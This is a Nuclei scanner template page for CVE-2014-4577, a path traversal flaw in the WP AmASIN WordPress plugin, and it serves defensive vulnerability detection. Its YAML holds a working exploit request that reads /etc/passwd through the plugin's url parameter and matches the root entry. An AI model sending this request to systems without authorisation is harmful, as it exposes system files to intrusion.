Skip to content
Nuclei Templates

WP AmASIN – The Amazon Affiliate Shop - Local File Inclusion

ID: CVE-2014-4577

Severity: medium

Author: DhiyaneshDK

Tags: cve,cve2014,wordpress,wpscan,wp-plugin,lfi,wp,wp-amasin-the-amazon-affiliate-shop

Description

Section titled “Description”

Absolute path traversal vulnerability in reviews.php in the WP AmASIN - The Amazon Affiliate Shop plugin 0.9.6 and earlier for WordPress allows remote attackers to read arbitrary files via a full pathname in the url parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2014-4577


info:
  name: WP AmASIN – The Amazon Affiliate Shop - Local File Inclusion
  author: DhiyaneshDK
  severity: medium
  description: |
    Absolute path traversal vulnerability in reviews.php in the WP AmASIN - The Amazon Affiliate Shop plugin 0.9.6 and earlier for WordPress allows remote attackers to read arbitrary files via a full pathname in the url parameter.
  reference:
    - https://codevigilant.com/disclosure/wp-plugin-wp-amasin-the-amazon-affiliate-shop-local-file-inclusion/
    - https://wpscan.com/plugin/wp-amasin-the-amazon-affiliate-shop/
    - https://github.com/superlink996/chunqiuyunjingbachang
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2014-4577
    cwe-id: CWE-22
    epss-score: 0.00847
    epss-percentile: 0.82512
    cpe: cpe:2.3:a:websupporter:wp_amasin_-_the_amazon_affiliate_shop:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: websupporter
    product: wp_amasin_-_the_amazon_affiliate_shop
    framework: wordpress
    publicwww-query: "/wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/"
  tags: cve,cve2014,wordpress,wpscan,wp-plugin,lfi,wp,wp-amasin-the-amazon-affiliate-shop


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"/wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/")'
          - 'status_code == 200'
        condition: and
        internal: true


  - raw:
      - |
        GET /wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/reviews.php?url=/etc/passwd HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 4a0a0047304502201c0ced19d7033608aaa9b61329726a7092a101f937a51240edc0fbf82f3deeba022100ff98620310480743b75e5275fd2e6ea6feb423a161a5c0f5aca12267daa3035a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2014/CVE-2014-4577.yaml"

View on Github